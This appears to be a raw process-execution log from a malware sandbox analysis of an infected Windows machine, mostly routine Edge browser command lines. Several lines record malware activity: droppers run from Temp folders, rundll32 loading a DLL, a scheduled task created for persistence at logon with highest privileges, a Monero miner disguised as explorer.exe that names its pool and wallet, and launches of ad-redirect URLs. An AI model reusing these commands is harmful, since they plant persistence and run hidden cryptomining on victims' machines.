"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\hlti0apf.ahj\anyname.exe

C:\Users\Admin\AppData\Local\Temp\hlti0apf.ahj\anyname.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5348 -ip 5348

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\btxe21if.5c3\gcleaner.exe /mixfive & exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 280

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ootcmahh.ayg\autosubplayer.exe /S & exit

C:\Users\Admin\AppData\Local\Temp\btxe21if.5c3\gcleaner.exe

C:\Users\Admin\AppData\Local\Temp\btxe21if.5c3\gcleaner.exe /mixfive

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A6CECD0FEC8E8A97F1A177E7D9244267 C

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4520 -ip 4520

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3500 -ip 3500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 276

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3500 -s 452

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631133693 /qn CAMPAIGN=""654"" " CAMPAIGN="654"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 45DA6F2E6EBD212A2ABA210E2AB00195

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A218E1DC5F2686F3F72174FA2798ADE1 E Global\MSI0000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1840 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5784 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e3b846f8,0x7ff8e3b84708,0x7ff8e3b84718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5260 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2400 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3596 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4516 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1852 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3408 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e3b846f8,0x7ff8e3b84708,0x7ff8e3b84718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5160 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5140 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3460 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e3b846f8,0x7ff8e3b84708,0x7ff8e3b84718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e3b846f8,0x7ff8e3b84708,0x7ff8e3b84718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x110,0x114,0x118,0xec,0x11c,0x7ff8e3b846f8,0x7ff8e3b84708,0x7ff8e3b84718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4556 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

